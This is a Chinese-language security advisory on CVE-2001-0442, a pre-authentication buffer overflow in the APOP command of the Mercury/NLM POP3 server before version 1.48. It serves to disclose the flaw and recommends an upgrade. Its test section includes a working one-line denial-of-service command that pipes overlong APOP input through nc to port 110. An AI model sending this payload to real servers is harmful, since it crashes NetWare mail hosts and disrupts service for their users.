发布日期：2001-04-29
更新日期：2001-04-29

受影响系统：

David Harris Mercury/NLM 1.47
    David Harris Mercury/NLM 1.46
    David Harris Mercury/NLM 1.45

不受影响系统：

David Harris Mercury/NLM 1.48

描述：

---

BUGTRAQ  ID: 2641
CVE(CAN) ID: CVE-2001-0442
  
Mercury MTA是一个用于Novell NetWare和Windows NT的邮件传输代理（Mail-Transfer Agent，简称MTA）。Novell平台上的Mercury POP3服务器的v1.48之前的版本存在一个缓冲区溢出漏洞，这是由于其在处理APOP认证命令时未对字符串进行充分的检查。

由于溢出发生在认证命令分析器中，所以未经认证的远程用户可以引发这种溢出。目前尚不清楚是否可以通过溢出来执行任意代码，但是已有概念证明式的代码可以击溃NetWare服务器，需要重启才可恢复正常。

<* 来源：Przemyslaw Frasunek (venglin@freebsd.lublin.pl）*>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

下面的命令将使运行有Mercury MTA的名为mercury_host的主机崩溃：
perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc mercury_host 110

建议：

---

升级到v1.48：
http://www.pmail.com/downloads.htm

浏览次数：4206
严重程度：0（网友投票）